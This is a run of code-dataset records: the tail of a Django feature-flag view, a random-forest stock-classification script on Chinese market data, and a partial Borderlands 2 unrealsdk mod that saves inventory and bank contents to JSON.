their\n feature states for analytics purposes\n\n :param request: HTTP request\n :return: True if value set. 
None otherwise.\n \"\"\"\n if organisation.has_requested_features:\n return None\n\n referer = request.META.get(\"HTTP_REFERER\")\n if not referer or \"bullet-train.io\" in referer:\n return None\n else:\n organisation.has_requested_features = True\n organisation.save()\n return True\n","sub_path":"src/features/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"411031662","text":"#%%\nfrom sklearn import linear_model, decomposition, ensemble, preprocessing, isotonic, metrics\nfrom sklearn.ensemble import RandomForestClassifier as RF\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import Imputer\nfrom sklearn_pandas import DataFrameMapper, cross_val_score\nimport sklearn.metrics as me \nimport pandas as pd\nimport sys,os\nimport numpy as np\nimport logging\nfrom datetime import *\nimport dateutil.relativedelta\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontManager, FontProperties \nimport pickle\nimport seaborn as sns\nfrom sklearn.preprocessing import Binarizer\nimport scipy.stats as stats \n\n\n\ndef onehot_to_category(onehot):\n b = np.array([[0], [1], [2],[3],[4],[5]])\n return np.dot(onehot,b).flatten()\n\ndef load_X_train():\n '''\n path = '/Users/huiyang/Documents/quantest/data_Shared/tuShare/'\n X_train = pd.read_excel(path + \"hist_data_M1.xlsx\")\n X_train['code'] = X_train['code'].map(lambda x: str(x).zfill(6))\n #X_train = X_train[X_train.date >= '2018-05-01']\n X_train.sort_values(by=['code' , 'date'], ascending=True, inplace=True)\n\n #filename = 'X_train_M1.xlsx'\n #X_train.to_excel(path + filename)\n # generate Y\n X_train_with_Y = pd.DataFrame([])\n X_test = pd.DataFrame([])\n code_list = sorted(X_train.code.drop_duplicates().tolist())\n for code in code_list:\n #print(code)\n X_train_code = X_train[X_train.code == code]\n if len(X_train_code) >= 2:\n i = 0\n while i <= (len(X_train_code) - 1):\n if i == (len(X_train_code) - 1):\n #输出最后一行到X_test,并从X_train集合删除\n X_train_code.iloc[i,6] = None\n X_train_code.iloc[i,7] = None\n X_test = X_test.append(X_train_code.tail(1))\n X_train_code = X_train_code.drop(X_train_code.index[i])\n else:\n X_train_code.iloc[i,6] = X_train_code.iloc[i+1,6] # price_change\n X_train_code.iloc[i,7] = X_train_code.iloc[i+1,7] # p_change\n i = i + 1\n \n X_train_with_Y = X_train_with_Y.append(X_train_code)\n\n filename = 'X_train_with_Y.xlsx'\n X_train_with_Y.to_excel(path + filename)\n filename = 'X_test.xlsx'\n X_test.to_excel(path + filename)\n\n # please note stock_basics_hist only contains data from 2016-08-09\n path = '/Users/huiyang/Documents/quantest/data_Shared/tuShare/'\n stock_basics_hist = pd.read_excel(path + \"stock_basics_hist.xlsx\")\n stock_basics_hist['code'] = stock_basics_hist['code'].map(lambda x: str(x).zfill(6))\n\n # testing purpose start\n path = '/Users/huiyang/Documents/quantest/data_Shared/tuShare/'\n X_train = pd.read_excel(path + \"X_train_with_Y.xlsx\")\n X_train['code'] = X_train['code'].map(lambda x: str(x).zfill(6))\n # testing purpose end\n stock_fundamentals_all = pd.read_excel(path + \"stock_fundamentals_all.xlsx\")\n stock_fundamentals_all['code'] = stock_fundamentals_all['code'].map(lambda x: str(x).zfill(6))\n X_train_with_fundamentals = pd.DataFrame([])\n for code, date in zip(X_train.code, X_train.date):\n stock_fundamentals = stock_fundamentals_all[(stock_fundamentals_all.code == code) 
\\\n & (stock_fundamentals_all.report_date <= date)]\n stock_basics_code = stock_basics_hist[(stock_basics_hist.code == code) \\\n &(stock_basics_hist.date <= date)]\n if not stock_fundamentals.empty:\n stock_fundamentals.sort_values(by='report_date', ascending=True, inplace=True)\n stock_fundamentals = stock_fundamentals.tail(1)\n stock_basics_code.sort_values(by='date', ascending=True, inplace=True)\n stock_basics_code = stock_basics_code.tail(1)\n X_train_code = X_train[(X_train.code == code) \\\n & (X_train.date == date)]\n X_train_code = pd.merge(X_train_code, stock_fundamentals, how='left', on=['code'])\n X_train_code = pd.merge(X_train_code, stock_basics_code, how='left', on=['code'])\n X_train_with_fundamentals = X_train_with_fundamentals.append(X_train_code)\n X_train_with_fundamentals.to_excel(path + 'X_train_with_fundamentals_M1.xlsx')\n '''\n # testing purpose start\n path = '/Users/huiyang/Documents/quantest/data_Shared/tuShare/'\n X_train = pd.read_excel(path + \"X_train_with_fundamentals_M1.xlsx\")\n X_train['code'] = X_train['code'].map(lambda x: str(x).zfill(6))\n\n # testing purpose end\n\n # get the volume for week\n\n # get the turnover ratio for week\n\n # need to check why no new stocks in the list.\n return X_train\n\n\ndef feature_engineering(X_train):\n #---------------------------------\n # Step 1: Select Data\n #----------------------------------\n #filter those timetomarket less than 60 days\n X_train = X_train.set_index(['code', 'date_x'], drop=False)\n print('total count before: ' + str(len(X_train)))\n for index, date, timetomarket in zip(X_train.index, X_train.date_x, X_train.timeToMarket_x):\n if date <= (datetime.strptime(timetomarket, '%Y-%m-%d') + \\\n dateutil.relativedelta.relativedelta(days=60)).date().isoformat():\n X_train = X_train.drop([index])\n X_train = X_train.reset_index(drop=True)\n print('total count after: ' + str(len(X_train)))\n\n # drop the unnecessary fields\n X_train.drop(\n ['code', 'date_x', 'open', 'high', 'low', \\\n 'name_x', 'report_date', 'quarter', \\\n 'price_change', 'v_ma5', 'v_ma10', 'v_ma20', \\\n 'volume', 'area_y', 'date_y', 'industry_y', 'name', 'timeToMarket_y'\n ], inplace=True, axis=1, errors='ignore')\n\n\n\n # industry filter\n #X_train = X_train[X_train.industry == '银行']\n #X_train.drop(\n # ['industry', 'area', 'timeToMarket', 'currentratio', 'quickratio', \\\n # 'cashratio', 'icratio', 'cashflowratio', 'cf_sales','arturnover', 'arturndays', \\\n # 'inventory_turnover', 'inventory_days', 'currentasset_turnover', 'currentasset_days', \\\n # 'mbrg', 'rateofreturn', 'cf_nm', 'cf_liabilities', 'ma5', 'ma10', 'ma20'\n # ], inplace=True, axis=1, errors='ignore')\n\n\n #---------------------------------\n # Step 2: Preprocess Data\n #----------------------------------\n X_train.rename(columns={'industry_x':'industry'}, inplace=True)\n X_train.rename(columns={'area_x':'area'}, inplace=True)\n X_train.rename(columns={'timeToMarket_x':'timeToMarket'}, inplace=True)\n\n \n #imputation of the missing values\n X_train['currentratio'] = X_train['currentratio'].map \\\n (lambda x: 'NaN' if x == '--' else x)\n X_train['quickratio'] = X_train['quickratio'].map \\\n (lambda x: 'NaN' if x == '--' else x)\n X_train['cashratio'] = X_train['cashratio'].map \\\n (lambda x: 'NaN' if x == '--' else x)\n X_train['icratio'] = X_train['icratio'].map \\\n (lambda x: 'NaN' if x == '--' else x) \n X_train['currentratio'] = X_train['currentratio'].astype('float64') \n X_train['quickratio'] = X_train['quickratio'].astype('float64') \n 
X_train['cashratio'] = X_train['cashratio'].astype('float64') \n X_train['icratio'] = X_train['icratio'].astype('float64') \n\n # for distrib\n X_train['distrib'] = X_train['distrib'].map(lambda x: 0 if x is np.nan else 1)\n #pd.set_option('display.max_columns', None)\n X_train['distrib'] = X_train['distrib'].astype('uint8') \n\n #timeToMarket\n X_train['timeToMarket'] = X_train['timeToMarket'].map(lambda x: x[0:4])\n X_train['timeToMarket'] = X_train['timeToMarket'].astype('uint8') \n\n\n # value count - frequency distribution\n \n #print(sorted(X_train.industry.drop_duplicates().tolist()))\n print('Total of categories in - industry: ')\n print(X_train['industry'].value_counts().count())\n print('frequency distribution of each category: ')\n print(X_train['industry'].value_counts())\n\n '''\n [周期股:\n '专用机械', '机床制造', '电气设备', '轻工机械', '运输设备', '机械基件','电器仪表'\n '全国地产', '其他建材', '区域地产', '工程机械', '房产服务', \n '园区开发', '建筑施工', '装修装饰', '水泥', '玻璃'\n '煤炭开采', '船舶', \n '造纸', \n '铁路', '港口', '空运', '公路', '仓储物流', '水运', '路桥', '机场', '航空'\n '铅锌', '铜', '铝', '小金属', '普钢', '特种钢', '钢加工', '焦炭加工', '矿物制品'\n '汽车整车', , '汽车服务', '汽车配件', '橡胶'\n '石油加工', '石油开采', '石油贸易', '塑料', '化工原料', '化工机械', '化纤'\n , '水力发电', '火力发电', '新型电力', '供气供热'\n , '保险', '银行', '证券', '多元金融', '黄金'\n\n 非周期:\n '中成药', '医疗保健', '医药商业', '化学制药', '生物制药'\n '互联网', '元器件', '半导体', '电脑设备', '软件服务', '通信设备'\n '乳制品', '农用机械', '农药化肥', '种植业', '饲料'\n '公共交通', '其他商业', '农业综合', \n , '商品城', '商贸代理', \n '啤酒', '白酒', '红黄药酒'\n '家居用品', '家用电器', '纺织', '纺织机械', '染料涂料', '服饰', \n '广告包装', '影视音像','出版业', '文教休闲', '旅游景点', '旅游服务', \n '批发业', '摩托车',\n '林业', '水务', '渔业', '环境保护', '电信运营', \n '电器连锁', '百货', '日用化工', '超市连锁', '软饮料', '酒店餐饮', '陶瓷', '食品',\n '综合类'\n ]\n '''\n periodic_stock = [\n '专用机械', '机床制造', '电气设备', '轻工机械', '运输设备', '机械基件','电器仪表',\n '全国地产', '其他建材', '区域地产', '工程机械', '房产服务', \n '园区开发', '建筑施工', '装修装饰', '水泥', '玻璃',\n '煤炭开采', '船舶', \n '造纸', \n '铁路', '港口', '空运', '公路', '仓储物流', '水运', '路桥', '机场', '航空',\n '铅锌', '铜', '铝', '小金属', '普钢', '特种钢', '钢加工', '焦炭加工', '矿物制品',\n '汽车整车', '汽车服务', '汽车配件', '橡胶',\n '石油加工', '石油开采', '石油贸易', '塑料', '化工原料', '化工机械', '化纤',\n '水力发电', '火力发电', '新型电力', '供气供热',\n '保险', '银行', '证券', '多元金融', '黄金'\n ]\n X_train['industry'] = X_train['industry'].map(lambda x: '周期' if x in periodic_stock else '非周期')\n # One-Hot encoding\n\n #cat_df_onehot = X_train.copy()\n X_train = pd.get_dummies(X_train, columns=['industry'], prefix = ['industry'])\n\n \n #print(sorted(X_train.area.drop_duplicates().tolist()))\n print('Total of categories in - area: ')\n print(X_train['area'].value_counts().count())\n print(X_train['area'].value_counts())\n \n #东南:\n south_east = ['上海', '江苏','浙江', '福建', '深圳', '广东', '广西', \n '山东', '海南']\n #中部:\n middle = ['河南', '安徽', '湖北', '江西', '湖南']\n # 西北:\n west_north = ['陕西', '甘肃', '青海', '宁夏', '新疆']\n #东北:\n east_north = ['吉林' , '辽宁', '黑龙江']\n #华北:\n china_north = ['北京', '天津', '河北', '内蒙', '山西']\n #云贵:\n yun_gui = ['云南', '贵州']\n #川藏:\n chuan_zang = ['四川', '重庆', '西藏']\n\n X_train['area'] = X_train['area'].map(lambda x: '东南' if x in south_east else x)\n X_train['area'] = X_train['area'].map(lambda x: '中部' if x in middle else x)\n X_train['area'] = X_train['area'].map(lambda x: '西北' if x in west_north else x)\n X_train['area'] = X_train['area'].map(lambda x: '东北' if x in east_north else x)\n X_train['area'] = X_train['area'].map(lambda x: '华北' if x in china_north else x)\n X_train['area'] = X_train['area'].map(lambda x: '云贵' if x in yun_gui else x)\n X_train['area'] = X_train['area'].map(lambda x: '川藏' if x in chuan_zang else x)\n X_train = pd.get_dummies(X_train, columns=['area'], prefix = 
['area'])\n print(X_train)\n\n r, p=stats.pearsonr(X_train.eps_yoy,X_train.p_change)\n print (r)\n print (p)\n \n\n # drop the features with most of na values.\n X_train.drop(\n ['bvps_x', 'epcf' \\\n ], inplace=True, axis=1, errors='ignore')\n\n\n '''\n df = X_train.copy()\n #df.drop(['industry', 'area', 'timeToMarket' \\\n # ], inplace=True, axis=1, errors='ignore')\n imp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n \n mapper_df = DataFrameMapper([\n ('currentratio', imp.transform())\n ], df_out=True)\n #df = imp.fit_transform(df)\n print(mapper_df)\n '''\n '''\n X_train['industry'] = X_train['industry'].astype('category')\n X_train['area'] = X_train['area'].astype('category') \n #X_train['timeToMarket'] = X_train['timeToMarket'].astype('datetime64[D]') \n\n '''\n print(X_train.info())\n\n\n '''\n # estimate the score with or without imputation\n rng = np.random.RandomState(0)\n dataset = X_train\n X_full, y_full = dataset.currentratio, dataset.target\n n_samples = X_full.shape[0]\n n_features = X_full.shape[1]\n # Estimate the score on the entire dataset, with no missing values\n estimator = RandomForestRegressor(random_state=0, n_estimators=100)\n #score = cross_val_score(estimator, X_full, y_full).mean()\n #print(\"Score with the entire dataset = %.2f\" % score)\n \n # Add missing values in 75% of the lines\n missing_rate = 0.75\n n_missing_samples = int(np.floor(n_samples * missing_rate))\n missing_samples = np.hstack((np.zeros(n_samples - n_missing_samples,\n dtype=np.bool),\n np.ones(n_missing_samples,\n dtype=np.bool)))\n rng.shuffle(missing_samples)\n missing_features = rng.randint(0, n_features, n_missing_samples)\n \n # Estimate the score without the lines containing missing values\n X_filtered = X_full[~missing_samples, :]\n y_filtered = y_full[~missing_samples]\n estimator = RandomForestRegressor(random_state=0, n_estimators=100)\n score = cross_val_score(estimator, X_filtered, y_filtered).mean()\n print(\"Score without the samples containing missing values = %.2f\" % score)\n\n # Estimate the score after imputation of the missing values\n X_missing = X_full.copy()\n X_missing[np.where(missing_samples)[0], missing_features] = 0\n y_missing = y_full.copy()\n estimator = Pipeline([(\"imputer\", Imputer(missing_values=0,\n strategy=\"mean\",\n axis=0)),\n (\"forest\", RandomForestRegressor(random_state=0,\n n_estimators=100))])\n score = cross_val_score(estimator, X_missing, y_missing).mean()\n print(\"Score after imputation of the missing values = %.2f\" % score)\n '''\n # check the null values\n print('Total of null values: ' + str(X_train.isnull().values.sum()))\n print('Column-wse distribution of null values: \\n' + str(X_train.isnull().sum()))\n \n\n # boxplot the data\n font_small = FontProperties(fname='/Library/Fonts/Songti.ttc',size=9)\n font_medium = FontProperties(fname='/Library/Fonts/Songti.ttc',size=10)\n font_large = FontProperties(fname='/Library/Fonts/Songti.ttc', size=12)\n font_xlarge = FontProperties(fname='/Library/Fonts/Songti.ttc', size=14)\n\n plt.style.use('ggplot')\n fig_train_data, axes = plt.subplots(nrows=1, ncols=1, figsize=(10, 15))\n fig_train_data.suptitle('Train Data - boxplot',fontproperties=font_xlarge)\n\n axes = pd.DataFrame(X_train.pb).boxplot()\n xlabels = axes.get_xticklabels()\n for xlabel in xlabels:\n xlabel.set_rotation(90)\n xlabel.set_fontproperties(font_small)\n ylabels = axes.get_yticklabels()\n for ylabel in ylabels:\n ylabel.set_fontproperties(font_small)\n\n plt.show()\n\n \n\n '''\n industry_count = 
X_train['industry'].value_counts()\n sns.set(style=\"darkgrid\")\n sns.barplot(industry_count.index, industry_count.values, alpha=0.9)\n plt.title('Frequency Distribution of Industry')\n plt.ylabel('Number of Occurrences', fontsize=12)\n plt.xlabel('Industry', fontsize=12)\n plt.draw()\n '''\n\n ################ procedure to clean the data#####################\n # fillna?\n # dropna?\n # Encoding Categorical Data:\n # Replacing values \n # (replace with int only, weighting a value improperly?)\n # Encoding labels \n # (replace with int only, weighting a value improperly?)\n # One-Hot encoding \n # (The basic strategy is to convert each category value \n # into a new column and assign a 1 or 0 (True/False) value \n # to the column, benefit of not weighting a value improperly.)\n # Binary encoding\n # the categories are encoded as ordinal, \n # then those integers are converted into binary code, \n # then the digits from that binary string are split into separate columns.\n # Backward difference encoding\n # the mean of the dependent variable for a level \n # is compared with the mean of the dependent variable for the prior level. \n # This type of coding may be useful for a nominal or an ordinal variable.\n # http://www.statsmodels.org/dev/contrasts.html\n # Miscellaneous features\n # split these ranges into two separate columns \n # or replace them with some measure like the mean of that range.\n # PCA 降维\n ################################################################################\n\n #import pdb \n #pdb.set_trace()\n \n '''\n # Replacing values\n df_lc = df.copy()\n df_lc['industry'] = df_lc['industry'].astype('category')\n df_lc['area'] = df_lc['area'].astype('category') \n print(df_lc.dtypes)\n\n labels = df_lc['industry'].astype('category').cat.categories.tolist()\n replace_map_comp = {'industry' : {k: v for k,v in zip(labels,list(range(1,len(labels)+1)))}}\n print(replace_map_comp)\n\n df_replace = df_lc.copy()\n df_replace.replace(replace_map_comp, inplace=True)\n print(df_replace)\n\n # Encoding labels\n from sklearn.preprocessing import LabelEncoder\n lb_make = LabelEncoder()\n df_replace['area_code'] = lb_make.fit_transform(df_replace['area'])\n print(df_replace)\n '''\n\n #---------------------------------\n # Step 3: Transform Data\n #----------------------------------\n '''\n # Backward difference encoding\n cat_df_bd = df.copy()\n encoder = ce.BackwardDifferenceEncoder(cols=['area'])\n df_bd = encoder.fit_transform(cat_df_bd)\n\n print(df_bd.head())\n\n # Miscellaneous features\n cat_df_mis = df.copy()\n dummy_df_age = pd.DataFrame({'age': ['0-20', '20-40', '40-60','60-80']})\n dummy_df_age['start'], dummy_df_age['end'] = zip(*dummy_df_age['age'].map(lambda x: x.split('-')))\n\n dummy_df_age.head()\n\n '''\n X_train = X_train.dropna()\n print(X_train)\n\n '''\n # PCA 检测, can only detect for numeric fields\n df = df.dropna()\n pca_df = df.drop(['10days_percentage'], inplace=False, axis=1, errors='ignore')\n\n sc = preprocessing.StandardScaler()\n X_train_std = sc.fit_transform(pca_df)\n print(pd.DataFrame(X_train_std))\n pca = decomposition.PCA(n_components = 10)\n pca.fit(X_train_std)\n print (pca.explained_variance_ratio_)\n print (pca.explained_variance_)\n #print (pca.components_)\n #pandas.DataFrame(pca.transform(df), \n # columns=['PCA%i' % i for i in range(n_components)], \n # index=df.index)\n df = pd.DataFrame(pca.fit_transform(X_train_std), \\\n columns=['PCA%i' % i for i in range(2)], \\\n index=X_train_std.index)\n\n print(df)\n '''\n 
X_train.loc[(X_train['p_change'] < 0), 'Y_bin'] = -1\n X_train.loc[(X_train['p_change'] >= 0), 'Y_bin'] = 0\n X_train.loc[(X_train['p_change'] > 10), 'Y_bin'] = 1\n print('frequency distribution of each category: ')\n print(X_train['Y_bin'].value_counts())\n\n X_train_columns = X_train.columns.values.tolist()\n max_abs_scaler = preprocessing.MaxAbsScaler()\n X_train_MaxAbs = max_abs_scaler.fit_transform(X_train)\n X_train = pd.DataFrame(X_train_MaxAbs, columns=X_train_columns)\n ################################################################################\n\n # Y binary classification\n #bound = np.nanpercentile(cat_df_onehot['10days_percentage'], 20)\n\n #test = pd.DataFrame(Binarizer(threshold=0).fit_transform(df))\n #print(test)\n\n #bound = 20\n\n return X_train\n\ndef RF_train(X_train):\n\n # train dataframe split\n #logging.info(today_all)\n X = X_train.copy()\n Y = X.pop('Y_bin')\n X.pop('p_change')\n print(X)\n print(Y)\n train_size_perc = 0.8\n train_size = np.int16(np.round(train_size_perc * X.shape[0]))\n logging.info(train_size)\n X_train, Y_train = X.iloc[:train_size, :], Y.iloc[:train_size] #?\n X_test, Y_test = X.iloc[train_size:,:], Y.iloc[train_size:] #?\n # Random Forest train\n scaler = preprocessing.MinMaxScaler()\n X_train_trans = scaler.fit_transform(X_train)\n model = RF(n_estimators=2000).fit(X_train_trans, Y_train)\n\n # save model file\n pkl_filename = sys.path[0] + '/' + 'RF_model' + '_' + version + '.pkl'\n print(pkl_filename)\n with open(pkl_filename, 'wb') as file: \n pickle.dump(model, file)\n file.close()\n\n # validate the model\n Y_pred = model.predict(X_test)\n print (me.classification_report(Y_test, Y_pred))\n\n feature_importances = pd.Series(model.feature_importances_, index=X.columns)\n print(feature_importances)\n\n # plot show\n feature_importances.sort_values(ascending=False, inplace=True)\n\n font_small = FontProperties(fname='/Library/Fonts/Songti.ttc',size=9)\n font_medium = FontProperties(fname='/Library/Fonts/Songti.ttc',size=10)\n font_large=FontProperties(fname='/Library/Fonts/Songti.ttc', size=12)\n font_xlarge=FontProperties(fname='/Library/Fonts/Songti.ttc', size=14)\n\n plt.style.use('ggplot')\n fig_feature_importance, axes = plt.subplots(nrows=1, ncols=1, figsize=(10, 15))\n fig_feature_importance.suptitle('Feature Importances',fontproperties=font_xlarge)\n\n ax = feature_importances.plot(kind='bar')\n ax.set_xlabel('Features',fontproperties=font_medium)\n ax.set_ylabel('Importance (Gini Coefficient)',fontproperties=font_medium)\n\n xlabels = ax.get_xticklabels()\n for xlabel in xlabels:\n xlabel.set_fontproperties(font_small)\n ylabels = ax.get_yticklabels()\n for ylabel in ylabels:\n ylabel.set_fontproperties(font_small)\n\n plt.show()\n return\n\ndef load_X_test():\n df = pd.read_excel(io=\"/Users/huiyang/Documents/SPSS modeler/复盘/today_all_R_square.xlsx\")\n return df\n\ndef RF_prediction(X, savedModel):\n ###########################predict#############################\n path = sys.path[0]\n pkl_filename = sys.path[0] + '/' + 'RF_model' + '_' + version + '.pkl'\n # Load from file\n with open(pkl_filename, 'rb') as file: \n model = pickle.load(file)\n # RF prediction\n Y_pred = model.predict(X)\n #print (me.classification_report(X_test, Y_pred))\n\n feature_importances = pd.Series(model.feature_importances_, index=X.columns)\n print(feature_importances)\n\n return Y_pred\n\n\n\nif __name__ == '__main__': \n version = 'v2.0'\n \n X_train = load_X_train()\n\n train_df = feature_engineering(X_train=X_train)\n\n 
#####################################\n # for train and generate model\n RF_train(X_train=train_df)\n #for load model\n #model = load_model()\n #####################################\n\n #X_test = load_X_test()\n #RF_prediction(X=X_test, savedModel='RF_model.pkl')\n plt.show(block=False)","sub_path":"Machine_Learning/Random_Forest_V2.0.py","file_name":"Random_Forest_V2.0.py","file_ext":"py","file_size_in_byte":25095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"397538307","text":"import unrealsdk\nfrom unrealsdk import *\n\nfrom . import logging\n\nimport json\nimport os\n\n\n@logging.log_all_calls(logging.call_logger)\nclass PySave:\n\n def __init__(self, path):\n self.LOAD_PATH = None\n self.STASH_PATH = None\n self.stash_size = 6\n self.PATH = path\n self.b_load_json = False\n self.b_new_save = False\n self.b_apply_savedata = False\n\n def Enable(self):\n try:\n self.set_load_path(self.get_player_controller().\n GetSaveGameNameFromid(self.get_player_controller().GetCachedSaveGame().SaveGameId))\n except Exception as e:\n logging.logger.info(e)\n logging.logger.info(\"No CachedSaveGame found!\")\n\n def SaveGame_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.set_load_path(params.Filename)\n self.on_save_game(params)\n return True\n\n def BeginLoadGame_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.set_load_path(params.Filename)\n return True\n\n # It seems that ApplyItemSaveGameData() gets always called before ApplyWeaponSaveGameData().\n # I hope this is consistent\n def ApplyItem_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n if self.b_apply_savedata or not self.check_load_json_is_valid() or self.b_new_save:\n return True\n return False\n\n def ApplyGun_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n if self.b_apply_savedata or not self.check_load_json_is_valid() or self.b_new_save:\n self.b_new_save = False\n return True\n return False\n\n def OnSpawn_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n \"\"\"Not needed anymore maybe\"\"\"\n if self.b_new_save:\n return True\n if params.bIsInitialSpawn or params.bIsClassChange:\n self.b_load_json = True\n return True\n\n def BankStoreWpn_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.save_bank(params.WWeapon.DefinitionData, True, caller)\n return True\n\n def BankStoreItm_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.save_bank(params.WItem.DefinitionData, False, caller)\n return True\n\n def BankOpen_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n return self.bank_on_open(caller)\n\n def BankClose_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n return self.bank_on_close(caller)\n\n def NewGame_Hook(caller: UObject, function: UFunction, params: FStruct) -> bool:\n self.b_load_json = False\n self.b_new_save = True\n logging.logger.info(f\"bl2pysave b_new_save: {self.b_new_save}\")\n return True\n\n unrealsdk.RegisterHook(\"WillowGame.WillowSaveGameManager.SaveGame\", \"SaveGame_Hook\", SaveGame_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowSaveGameManager.BeginLoadGame\", \"BeginLoadGame_Hook\",\n BeginLoadGame_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowPlayerController.ApplyItemSaveGameData\", \"ApplyItem_Hook\",\n ApplyItem_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowPlayerController.ApplyWeaponSaveGameData\", \"ApplyGun_Hook\",\n 
ApplyGun_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowPlayerController.ShouldLoadSaveGameOnSpawn\", \"OnSpawn_Hook\",\n OnSpawn_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowInventoryStorage.PutWeapon\", \"BankStoreWeapon\",\n BankStoreWpn_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowInventoryStorage.PutItem\", \"BankStoreItem\", BankStoreItm_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowInventoryStorage.Open\", \"BankOpen\", BankOpen_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowInventoryStorage.Close\", \"BankCloe\", BankClose_Hook)\n unrealsdk.RegisterHook(\"WillowGame.WillowGlobals.GetDefaultPlayerSaveGame\", \"NewGame\", NewGame_Hook)\n\n def Disable(self):\n pass\n\n def on_end_load(self):\n # We load our saves after the new materials got assigned or else the equipped gear wont have the right skin\n if self.b_load_json:\n logging.logger.debug(f\"Will now try to load {self.LOAD_PATH}\")\n self.compare_and_load()\n self.b_load_json = False\n if self.b_apply_savedata:\n self.b_apply_savedata = False\n\n def set_load_path(self, Filename):\n if not os.path.exists(os.path.join(self.PATH, \"Saves\")):\n logging.logger.debug(f\"Could not find /Saves/ will now attempt to create it!\")\n # if the \"Saves/\" folder does not exist, create it\n os.makedirs(os.path.join(self.PATH, \"Saves\"))\n logging.logger.debug(f\"/Saves/ exists: {os.path.exists(os.path.join(self.PATH, 'Saves'))}\")\n\n filename = Filename.split(\".\")[0] # get the save name without its .sav extension\n if os.path.isfile(os.path.join(self.PATH, \"Saves\", f\"{filename}.json\")):\n # if the json save exist, set it as the loading path\n self.LOAD_PATH = os.path.join(self.PATH, \"Saves\", filename + \".json\")\n self.b_new_save = False\n else:\n # else we need to create the json, mark it as new, so that the .sav items get loaded and wont be removed\n # because it now does exist, set it as the load path\n with open(os.path.join(self.PATH, \"Saves\", f\"{filename}.json\"), \"w\") as file:\n self.b_new_save = True\n self.LOAD_PATH = os.path.join(self.PATH, \"Saves\", filename + \".json\")\n logging.logger.debug(f\"Created 'Saves/{filename}.json'\")\n\n if not os.path.isfile(os.path.join(self.PATH, \"Saves\", \"STASH.json\")):\n with open(os.path.join(self.PATH, \"Saves\", \"STASH.json\"), \"w\") as f:\n json.dump({\"Weapons\": [], \"Items\": []}, f, indent=2)\n self.STASH_PATH = os.path.join(self.PATH, \"Saves\", \"STASH.json\")\n\n def get_player_controller(self):\n return GetEngine().GamePlayers[0].Actor\n\n def get_full_name(self, obj):\n if obj is not None:\n return obj.PathName(obj)\n elif obj is None:\n return \"None\"\n\n def get_weapon_from_data(self, defdata):\n return {\"WeaponTypeDefinition\": self.get_full_name(defdata.WeaponTypeDefinition),\n \"BalanceDefinition\": self.get_full_name(defdata.BalanceDefinition),\n \"ManufacturerDefinition\": self.get_full_name(defdata.ManufacturerDefinition),\n \"ManufacturerGradeIndex\": defdata.ManufacturerGradeIndex,\n \"BodyPartDefinition\": self.get_full_name(defdata.BodyPartDefinition),\n \"GripPartDefinition\": self.get_full_name(defdata.GripPartDefinition),\n \"BarrelPartDefinition\": self.get_full_name(defdata.BarrelPartDefinition),\n \"SightPartDefinition\": self.get_full_name(defdata.SightPartDefinition),\n \"StockPartDefinition\": self.get_full_name(defdata.StockPartDefinition),\n \"ElementalPartDefinition\": self.get_full_name(defdata.ElementalPartDefinition),\n \"Accessory1PartDefinition\": self.get_full_name(defdata.Accessory1PartDefinition),\n 
\"Accessory2PartDefinition\": self.get_full_name(defdata.Accessory2PartDefinition),\n \"MaterialPartDefinition\": self.get_full_name(defdata.MaterialPartDefinition),\n \"PrefixPartDefinition\": self.get_full_name(defdata.PrefixPartDefinition),\n \"TitlePartDefinition\": self.get_full_name(defdata.TitlePartDefinition),\n \"GameStage\": defdata.GameStage,\n \"UniqueId\": defdata.UniqueId, }\n\n def get_item_from_data(self, defdata):\n return {\"ItemDefinition\": self.get_full_name(defdata.ItemDefinition),\n \"BalanceDefinition\": self.get_full_name(defdata.BalanceDefinition),\n \"ManufacturerDefinition\": self.get_full_name(defdata.ManufacturerDefinition),\n \"ManufacturerGradeIndex\": defdata.ManufacturerGradeIndex,\n \"AlphaItemPartDefinition\": self.get_full_name(defdata.AlphaItemPartDefinition),\n \"BetaItemPartDefinition\": self.get_full_name(defdata.BetaItemPartDefinition),\n \"GammaItemPartDefinition\": self.get_full_name(defdata.GammaItemPartDefinition),\n \"DeltaItemPartDefinition\": self.get_full_name(defdata.DeltaItemPartDefinition),\n \"EpsilonItemPartDefinition\": self.get_full_name(defdata.EpsilonItemPartDefinition),\n \"ZetaItemPartDefinition\": self.get_full_name(defdata.ZetaItemPartDefinition),\n \"EtaItemPartDefinition\": self.get_full_name(defdata.EtaItemPartDefinition),\n \"ThetaItemPartDefinition\": self.get_full_name(defdata.ThetaItemPartDefinition),\n \"MaterialItemPartDefinition\": self.get_full_name(defdata.MaterialItemPartDefinition),\n \"PrefixItemNamePartDefinition\": self.get_full_name(defdata.PrefixItemNamePartDefinition),\n \"TitleItemNamePartDefinition\": self.get_full_name(defdata.TitleItemNamePartDefinition),\n \"GameStage\": defdata.GameStage,\n \"UniqueId\": defdata.UniqueId, }\n\n def save_bank(self, def_data, is_wpn, caller):\n # We dont need to check for file existence because if you store an item to the bank you already had saved at\n # least once\n if caller.MaxSlots == 4:\n save_file = open(self.STASH_PATH, \"r\")\n else:\n save_file = open(self.LOAD_PATH, \"r\")\n save_json = json.load(save_file)\n save_file.close()\n\n if caller.MaxSlots == 4:\n # actually the 